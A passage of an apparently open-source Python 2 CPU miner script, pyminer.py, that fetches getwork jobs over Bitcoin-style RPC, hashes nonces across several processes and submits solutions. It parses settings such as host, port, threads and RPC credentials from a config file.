return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9988
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.